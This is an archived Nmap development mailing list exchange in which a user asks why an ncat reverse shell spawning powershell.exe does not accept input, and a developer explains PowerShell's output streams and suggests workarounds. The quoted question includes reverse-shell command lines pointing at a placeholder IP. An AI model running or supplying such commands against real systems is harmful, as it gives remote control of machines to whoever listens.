Nmap Development mailing list archives
Re: Netcat powershell bug?
From: Daniel Miller <bonsaiviking () gmail com>
Date: Mon, 23 Jan 2017 07:53:17 -0600
Efrat, I'm afraid I don't have a solution, but I can guess at the source of the problem: Ncat does execution by redirecting the three primary I/O streams to the TCP connection: stdin, stdout, and stderr. Powershell, on the other hand, has many more output streams. It has streams for progress indication, logging, error, output, and more. Ncat probably is just not handling this properly. Also, if it's anything like some Linux commands (like vi, screen, or anything using ncurses), it can probably read directly from something like a pseudo terminal device, which is not the stdin stream. I have not tried this, but you could try executing powershell.exe within cmd.exe and see if that solves the streams problem: use --sh-exec instead of -e to do this. Of course, the canonical answer is to use a feature of Powershell like Powershell Remoting or even use Powershell code itself to do the TCP connection instead of using Ncat or another 3rd-party binary. Dan On Sun, Jan 22, 2017 at 7:45 AM, Efrat Rozen <efratrozen1983 () gmail com> wrote:
Hi -im having trouble openening a reverse powershell shell using ncat im using the executable version of ncat on client windows and runing the listener on kali using nc -l command. When i launch this command on my windows target: ncat.exe [ public ip] [port] -e cmd.exe it opens a cmd reverse shell perfectly on the kali listener. but when i use: ncat.exe [ public ip] [port] -e powershell.exe it just opend the powershell 'welcome' on kali listener without any option to type in commands. can you please offer some sussgestions? ill be happy to donate as well:) thanks. _______________________________________________ Sent through the dev mailing list https://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
_______________________________________________ Sent through the dev mailing list https://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Netcat powershell bug? Efrat Rozen (Jan 22)
- Re: Netcat powershell bug? Daniel Miller (Jan 23)